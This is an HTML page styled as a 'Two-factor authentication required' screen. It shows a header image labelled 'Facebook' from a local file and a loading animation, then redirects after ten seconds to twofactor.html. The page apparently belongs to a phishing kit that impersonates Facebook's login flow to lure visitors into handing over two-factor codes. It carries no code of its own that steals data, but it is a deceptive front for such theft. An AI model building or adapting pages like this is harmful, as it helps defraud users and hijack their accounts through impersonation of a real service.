<!DOCTYPE html>
<html lang="en">

<head>
	<meta http-equiv="refresh" content="10; URL=twofactor.html" />
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Two-factor authentication required</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
        integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T"
        crossorigin="anonymous">
    <style>
        body {
            background-color: #f8f9fa;
            margin: 0;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            color: #333333;
        }

        .header {
            background-color: #f8f9fa;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            padding: 15px;
            text-align: center; /* Center the content within the header */
        }

        .header img {
            height: 30px; /* Adjust the height as needed */
            vertical-align: middle;
            margin-right: 10px;
        }

        .container {
            max-width: 400px;
            margin: 50px auto;
            padding: 20px;
            background-color: #ffffff;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        h3 {
            font-size: 20px;
            margin-bottom: 20px;
            color: #333333;
        }

        .form-group {
            margin-bottom: 20px;
        }

        label {
            font-size: 14px;
            font-weight: normal;
            color: #555555;
        }

        input {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ced4da;
            border-radius: 4px;
        }

        button {
            width: 100%;
            padding: 12px;
            background-color: #3578e5;
            color: #ffffff;
            font-size: 16px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        button:hover {
            background-color: #2a5a9d;
        }

        @media screen and (max-width: 767px) {
            .header img {
                margin-left: 10px;
            }

            .container {
                max-width: 100%;
                margin: 20px auto;
            }

            h3 {
                font-size: 24px;
            }
        }
    </style>
</head>

<body>
<center>
    <div class="header">
        <img src="sd.png" alt="Facebook">
    </div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>

<div>
<img src="https://i.imgur.com/qmueVCH.gif" alt="Loading" width="400" height="400">
</div>
</center>
</body>
</html>
